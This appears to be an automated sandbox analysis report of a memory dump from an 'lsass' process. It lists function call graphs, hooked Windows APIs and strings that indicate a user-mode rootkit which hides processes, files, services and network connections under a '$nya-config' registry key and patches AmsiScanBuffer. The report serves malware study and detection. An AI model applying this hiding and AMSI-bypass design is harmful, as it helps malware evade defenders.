202c0ae358d GetProcessHeap HeapFree 8458->8459 8460 202c0ae3555 StrCmpW 8458->8460 8459->8456 8460->8459 8462 202c0ae356a 8460->8462 8462->8459 8463 202c0ae3950 StrCmpNW 8462->8463 8464 202c0ae39f2 8463->8464 8465 202c0ae3982 StrStrW 8463->8465 8464->8462 8465->8464 8466 202c0ae399b StrToIntW 8465->8466 8466->8464 8467 202c0ae39c3 8466->8467 8467->8464 8473 202c0ae1a30 OpenProcess 8467->8473 8470 202c0ae3f88 StrCmpNIW 8471 202c0ae39e4 8470->8471 8471->8464 8472 202c0ae1cfc 2 API calls 8471->8472 8472->8464 8474 202c0ae1ab6 8473->8474 8475 202c0ae1a64 K32GetModuleFileNameExW 8473->8475 8474->8464 8474->8470 8476 202c0ae1a7e PathFindFileNameW lstrlenW 8475->8476 8477 202c0ae1aad CloseHandle 8475->8477 8476->8477 8478 202c0ae1a9c StrCpyW 8476->8478 8477->8474 8478->8477 8479 202c0ae2ab4 TlsGetValue TlsGetValue TlsGetValue 8480 202c0ae2b0d 8479->8480 8485 202c0ae2b79 8479->8485 8483 202c0ae2b15 8480->8483 8480->8485 8481 202c0ae2b74 8482 202c0ae2c32 TlsSetValue TlsSetValue TlsSetValue 8482->8481 8483->8481 8483->8482 8484 202c0ae3f88 StrCmpNIW 8483->8484 8484->8483 8485->8481 8485->8482 8486 202c0ae3f88 StrCmpNIW 8485->8486 8486->8485 9290 202c0aebd34 9291 202c0aebd4d 9290->9291 9292 202c0aebd49 9290->9292 9293 202c0aee864 56 API calls 9291->9293 9294 202c0aebd52 9293->9294 9305 202c0aeedc8 GetEnvironmentStringsW 9294->9305 9297 202c0aebd5f 9300 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9297->9300 9298 202c0aebd6b 9325 202c0aebda8 9298->9325 9300->9292 9302 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9303 202c0aebd92 9302->9303 9304 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9303->9304 9304->9292 9306 202c0aebd57 9305->9306 9307 202c0aeedf8 9305->9307 9306->9297 9306->9298 9308 202c0aeece8 WideCharToMultiByte 9307->9308 9309 202c0aeee49 9308->9309 9310 202c0aeee53 FreeEnvironmentStringsW 9309->9310 9311 202c0aec5d0 14 API calls 9309->9311 9310->9306 9312 202c0aeee63 9311->9312 9313 202c0aeee6b 9312->9313 9314 202c0aeee74 9312->9314 9315 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9313->9315 9316 202c0aeece8 WideCharToMultiByte 9314->9316 9317 202c0aeee72 9315->9317 9318 202c0aeee97 9316->9318 9317->9310 9319 202c0aeee9b 9318->9319 9320 202c0aeeea5 9318->9320 9322 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9319->9322 9321 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9320->9321 9323 202c0aeeea3 FreeEnvironmentStringsW 9321->9323 9322->9323 9323->9306 9326 202c0aebdcd 9325->9326 9327 202c0aed220 _invalid_parameter_noinfo 13 API calls 9326->9327 9338 202c0aebe03 9327->9338 9328 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9330 202c0aebd73 9328->9330 9329 202c0aebe6d 9331 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9329->9331 9330->9302 9331->9330 9332 202c0aed220 _invalid_parameter_noinfo 13 API calls 9332->9338 9333 202c0aebe92 9335 202c0aebebc 13 API calls 9333->9335 9334 202c0aec328 __std_exception_copy 38 API calls 9334->9338 9336 202c0aebe9a 9335->9336 9337 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9336->9337 9340 202c0aebe0b 9337->9340 9338->9329 9338->9332 9338->9333 9338->9334 9339 202c0aebea6 9338->9339 9338->9340 9342 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9338->9342 9341 202c0aed06c _invalid_parameter_noinfo 17 API calls 9339->9341 9340->9328 9343 202c0aebeb9 9341->9343 9342->9338 8892 202c0af4611 __scrt_dllmain_exception_filter 9344 202c0aec510 9345 202c0aec518 9344->9345 9346 202c0aec545 9345->9346 9348 202c0aec574 9345->9348 9349 202c0aec59f 9348->9349 9350 202c0aec5a3 9349->9350 9351 202c0aec582 DeleteCriticalSection 9349->9351 9350->9346 9351->9349 8893 202c0ae820c 8900 202c0ae8f34 8893->8900 8898 202c0ae8219 8901 202c0ae9340 _CallSETranslator 9 API calls 8900->8901 8902 202c0ae8215 8901->8902 8902->8898 8903 202c0aec288 8902->8903 8904 202c0aecb10 __std_exception_copy 13 API calls 8903->8904 8905 202c0ae8222 8904->8905 8905->8898 8906 202c0ae8f48 8905->8906 8909 202c0ae92dc 8906->8909 8908 202c0ae8f51 8908->8898 8910 202c0ae92ed 8909->8910 8914 202c0ae9302 8909->8914 8911 202c0ae9c8c _CallSETranslator 6 API calls 8910->8911 8912 202c0ae92f2 8911->8912 8915 202c0ae9cd4 8912->8915 8914->8908 8916 202c0ae9aac __vcrt_FlsAlloc 5 API calls 8915->8916 8917 202c0ae9d02 8916->8917 8918 202c0ae9d0c 8917->8918 8919 202c0ae9d14 TlsSetValue 8917->8919 8918->8914 8919->8918 9352 202c0ae8f0c 9359 202c0ae946c 9352->9359 9358 202c0ae8f19 9360 202c0ae9474 9359->9360 9362 202c0ae94a5 9360->9362 9363 202c0ae8f15 9360->9363 9376 202c0ae9d28 9360->9376 9364 202c0ae94b4 __vcrt_uninitialize_locks DeleteCriticalSection 9362->9364 9363->9358 9365 202c0ae9400 9363->9365 9364->9363 9381 202c0ae9bfc 9365->9381 9377 202c0ae9aac __vcrt_FlsAlloc 5 API calls 9376->9377 9378 202c0ae9d5e 9377->9378 9379 202c0ae9d68 9378->9379 9380 202c0ae9d73 InitializeCriticalSectionAndSpinCount 9378->9380 9379->9360 9380->9379 9382 202c0ae9aac __vcrt_FlsAlloc 5 API calls 9381->9382 9383 202c0ae9c21 TlsAlloc 9382->9383 8487 202c0ae5c8d 8489 202c0ae5c94 8487->8489 8488 202c0ae5cfb 8489->8488 8490 202c0ae5d77 VirtualProtect 8489->8490 8491 202c0ae5da3 GetLastError 8490->8491 8492 202c0ae5db1 8490->8492 8491->8492 9385 202c0ae4320 9388 202c0ae426d _invalid_parameter_noinfo 9385->9388 9386 202c0ae42d7 9387 202c0ae42bd VirtualQuery 9387->9386 9387->9388 9388->9386 9388->9387 9389 202c0ae4322 GetLastError 9388->9389 9389->9386 9389->9388 7527 202c0aed220 7532 202c0aed231 _invalid_parameter_noinfo 7527->7532 7528 202c0aed282 7537 202c0aed1f4 7528->7537 7529 202c0aed266 HeapAlloc 7530 202c0aed280 7529->7530 7529->7532 7532->7528 7532->7529 7534 202c0aeb470 7532->7534 7540 202c0aeb4c0 7534->7540 7546 202c0aecb10 7537->7546 7545 202c0aec558 EnterCriticalSection 7540->7545 7547 202c0aecb59 GetLastError 7546->7547 7548 202c0aecb2f __std_exception_copy 7546->7548 7551 202c0aecb6c 7547->7551 7552 202c0aecb54 7548->7552 7555 202c0aec940 GetLastError 7548->7555 7549 202c0aecb8a SetLastError 7549->7552 7550 202c0aecb87 7550->7549 7551->7549 7551->7550 7553 202c0aec940 _invalid_parameter_noinfo 11 API calls 7551->7553 7552->7530 7553->7550 7556 202c0aec966 7555->7556 7557 202c0aec96c SetLastError 7556->7557 7573 202c0aed220 7556->7573 7558 202c0aec9e5 7557->7558 7558->7552 7561 202c0aec9a5 FlsSetValue 7564 202c0aec9b1 FlsSetValue 7561->7564 7565 202c0aec9c8 7561->7565 7562 202c0aec995 FlsSetValue 7580 202c0aed2a0 7562->7580 7567 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7564->7567 7586 202c0aec758 7565->7586 7570 202c0aec9c6 SetLastError 7567->7570 7570->7558 7578 202c0aed231 _invalid_parameter_noinfo 7573->7578 7574 202c0aed282 7577 202c0aed1f4 __std_exception_copy 12 API calls 7574->7577 7575 202c0aed266 HeapAlloc 7576 202c0aec987 7575->7576 7575->7578 7576->7561 7576->7562 7577->7576 7578->7574 7578->7575 7579 202c0aeb470 _invalid_parameter_noinfo 2 API calls 7578->7579 7579->7578 7581 202c0aed2a5 HeapFree 7580->7581 7583 202c0aec9a3 7580->7583 7582 202c0aed2c0 GetLastError 7581->7582 7581->7583 7584 202c0aed2cd Concurrency::details::SchedulerProxy::DeleteThis 7582->7584 7583->7557 7585 202c0aed1f4 __std_exception_copy 11 API calls 7584->7585 7585->7583 7591 202c0aec630 7586->7591 7603 202c0aec558 EnterCriticalSection 7591->7603 8920 202c0aefe20 8921 202c0aefe4a 8920->8921 8922 202c0aed220 _invalid_parameter_noinfo 13 API calls 8921->8922 8923 202c0aefe6a 8922->8923 8924 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8923->8924 8925 202c0aefe78 8924->8925 8926 202c0aefea2 8925->8926 8927 202c0aed220 _invalid_parameter_noinfo 13 API calls 8925->8927 8928 202c0aefec1 InitializeCriticalSectionEx 8926->8928 8931 202c0aefeab 8926->8931 8929 202c0aefe94 8927->8929 8928->8926 8930 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8929->8930 8930->8926 8932 202c0aef820 8935 202c0aef7d8 8932->8935 8940 202c0aec558 EnterCriticalSection 8935->8940 9198 202c0af479d 9201 202c0aeaf34 9198->9201 9202 202c0aeaf4e 9201->9202 9204 202c0aeaf9b 9201->9204 9203 202c0ae9324 _CallSETranslator 9 API calls 9202->9203 9202->9204 9203->9204 9390 202c0ae2518 GetProcessIdOfThread GetCurrentProcessId 9391 202c0ae25be 9390->9391 9392 202c0ae2543 CreateFileW 9390->9392 9392->9391 9393 202c0ae2577 WriteFile ReadFile CloseHandle 9392->9393 9393->9391 8941 202c0aec218 8942 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8941->8942 8943 202c0aec228 8942->8943 8944 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8943->8944 8945 202c0aec23c 8944->8945 8946 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8945->8946 8947 202c0aec250 8946->8947 8948 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8947->8948 8949 202c0aec264 8948->8949 9205 202c0af1398 9206 202c0af13ae 9205->9206 9207 202c0af13f5 9206->9207 9208 202c0af140e 9206->9208 9209 202c0aed1f4 __std_exception_copy 13 API calls 9207->9209 9211 202c0aedd78 14 API calls 9208->9211 9213 202c0af1405 9208->9213 9210 202c0af13fa 9209->9210 9212 202c0aed04c _invalid_parameter_noinfo 38 API calls 9210->9212 9211->9213 9212->9213

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 87 202c0ae2300-202c0ae233a NtQuerySystemInformation 88 202c0ae233c-202c0ae2340 87->88 89 202c0ae2343-202c0ae2346 87->89 88->89 90 202c0ae234c-202c0ae234f 89->90 91 202c0ae24f7-202c0ae2517 89->91 92 202c0ae2447-202c0ae244a 90->92 93 202c0ae2355-202c0ae2367 90->93 94 202c0ae244c-202c0ae2466 call 202c0ae35c8 92->94 95 202c0ae24bb-202c0ae24be 92->95 93->91 96 202c0ae236d-202c0ae2379 93->96 94->91 106 202c0ae246c-202c0ae2482 94->106 95->91 100 202c0ae24c0-202c0ae24d3 call 202c0ae35c8 95->100 98 202c0ae237b-202c0ae238b 96->98 99 202c0ae23a7-202c0ae23b2 call 202c0ae1cc4 96->99 98->99 102 202c0ae238d-202c0ae23a5 StrCmpNIW 98->102 107 202c0ae23d3-202c0ae23e5 99->107 110 202c0ae23b4-202c0ae23cc call 202c0ae1d30 99->110 100->91 109 202c0ae24d5-202c0ae24dd 100->109 102->99 102->107 106->91 113 202c0ae2484-202c0ae24a0 106->113 111 202c0ae23e7-202c0ae23e9 107->111 112 202c0ae23f5-202c0ae23f7 107->112 109->91 114 202c0ae24df-202c0ae24e7 109->114 110->107 125 202c0ae23ce-202c0ae23d1 110->125 116 202c0ae23f0-202c0ae23f3 111->116 117 202c0ae23eb-202c0ae23ee 111->117 118 202c0ae23fe 112->118 119 202c0ae23f9-202c0ae23fc 112->119 120 202c0ae24a4-202c0ae24b7 113->120 121 202c0ae24ea-202c0ae24f5 114->121 123 202c0ae2401-202c0ae2404 116->123 117->123 118->123 119->123 120->120 124 202c0ae24b9 120->124 121->91 121->121 126 202c0ae2406-202c0ae240c 123->126 127 202c0ae2412-202c0ae2415 123->127 124->91 125->123 126->96 126->127 127->91 128 202c0ae241b-202c0ae241f 127->128 129 202c0ae2421-202c0ae2424 128->129 130 202c0ae2436-202c0ae2442 128->130 129->91 131 202c0ae242a-202c0ae242f 129->131 130->91 131->128 132 202c0ae2431 131->132 132->91
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL ref: 00000202C0AE232B
                                                          • StrCmpNIW.SHLWAPI ref: 00000202C0AE239A
                                                            • Part of subcall function 00000202C0AE35C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE35EB
                                                            • Part of subcall function 00000202C0AE35C8: HeapAlloc.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE35FE
                                                            • Part of subcall function 00000202C0AE35C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE3673
                                                            • Part of subcall function 00000202C0AE35C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE36D9
                                                            • Part of subcall function 00000202C0AE35C8: HeapFree.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE36E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                          • String ID: $nya-$S
                                                          • API String ID: 722747020-3492252248
                                                          • Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                          • Instruction ID: 976f185b7510bdf11140a7ca03e3180a70de357a2b4d5b6b1581422fb8e9235f
                                                          • Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                          • Instruction Fuzzy Hash: F451C132B107A4C6F760CB25D88CAAD63E4F744788F069027DFA917B86DB39C969C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: dc3027e100e7a8585adb976db0aa4c1227795743895ae4604795d7442d5a4fc6
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: DD71C636610B50C9FB10DF76E89C69D23A4FB84B88F421123DB9E57A6ADE39C458C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: 08a2ebef705224ec87e7d243a31c2443f02d9759f98051242431abd315881b8a
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: C8519DA1140B8AE5FB14EB65EDCCBDC2720F740788F824923976A06167DE79C66EC390

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: f734452340a7dcf9d4f5df38be3cb1e1e1483fd86ec87bb37f84f6ee3b727116
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: ACD09E32611740D5FA1CAB21ECDC76C2261BF64F41FC70417C70E012A6DE3E895D8340

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3A35
                                                          • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3A44
                                                            • Part of subcall function 00000202C0AE3F88: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE272F), ref: 00000202C0AE3FA0
                                                            • Part of subcall function 00000202C0AE3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3EDB
                                                            • Part of subcall function 00000202C0AE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F0E
                                                            • Part of subcall function 00000202C0AE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F2E
                                                            • Part of subcall function 00000202C0AE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F47
                                                            • Part of subcall function 00000202C0AE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F68
                                                          • CreateThread.KERNELBASE ref: 00000202C0AE3A8B
                                                            • Part of subcall function 00000202C0AE1E74: GetCurrentThread.KERNEL32 ref: 00000202C0AE1E7F
                                                            • Part of subcall function 00000202C0AE1E74: CreateThread.KERNELBASE ref: 00000202C0AE2043
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2049
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2055
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2061
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE206D
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2079
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2085
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: d1958dc9e64c19f1a7617c4a24c7aaa22d2134b747b4393a871ac78407530116
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: FB114C73618781C2FB64E720A5CD7AD2290AB54789F52412B97E6862D3EF7AC4AC8640
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 1be2c9892de14d5c1d5809facac573890b70df83cb34a6729bbc88fd12841374
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 6991E273B05390C7EB648F29E48CB6DB395FB54B94F5682279F490778ADA38D81AC700

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000202C0AE1724: GetProcessHeap.KERNEL32 ref: 00000202C0AE172F
                                                            • Part of subcall function 00000202C0AE1724: HeapAlloc.KERNEL32 ref: 00000202C0AE173E
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17AE
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17DB
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE17F5
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1815
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.KERNELBASE ref: 00000202C0AE1830
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1850
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE186B
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE188B
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A6
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE18C6
                                                          • SleepEx.KERNELBASE ref: 00000202C0AE1BDF
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE18E1
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1901
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE191C
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE193C
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE1957
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1977
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE1992
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE199C
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: 89b458e9973c9e425d56098a404ff8a4da767c7608af5d0e3aa3f1987bcdbbf9
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 40311C752407A1C1FB549B26D9CC36D23A4EB84FC4F1654238FAAC7697EE24C8B8C214

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 192 202c0aed220-202c0aed22f 193 202c0aed231-202c0aed23d 192->193 194 202c0aed23f-202c0aed24f 192->194 193->194 195 202c0aed282-202c0aed28d call 202c0aed1f4 193->195 196 202c0aed266-202c0aed27e HeapAlloc 194->196 200 202c0aed28f-202c0aed294 195->200 197 202c0aed251-202c0aed258 call 202c0af06d0 196->197 198 202c0aed280 196->198 197->195 204 202c0aed25a-202c0aed264 call 202c0aeb470 197->204 198->200 204->195 204->196
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmpDownload File
